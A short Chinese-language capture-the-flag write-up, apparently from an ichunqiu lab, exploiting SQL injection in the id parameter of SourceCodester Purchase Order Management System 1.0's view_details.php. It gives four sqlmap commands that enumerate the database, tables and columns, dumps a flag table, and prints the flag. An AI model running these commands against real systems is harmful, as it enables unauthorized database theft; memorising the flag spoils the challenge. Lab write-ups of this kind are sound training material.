题目描述:在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
进入页面
进入他提示的组件位置
url输入id=1 看有没有回显
发现有回显,直接sqlmap爆破数据库
python sqlmap.py -u http://eci-2ze2p1wf1gssa5mroxky.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -dbs
接下来爆破表
python sqlmap.py -u http://eci-2ze2p1wf1gssa5mroxky.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -tables
然后爆字段
python sqlmap.py -u http://eci-2ze2p1wf1gssa5mroxky.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -T fllllaaaag -columns
接下来爆数据
python sqlmap.py -u http://eci-2ze2p1wf1gssa5mroxky.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -T fllllaaaag -C flag -dump
顺利拿到flag
flag{4c8dcb54-05f7-4341-bc9b-669c1453670c}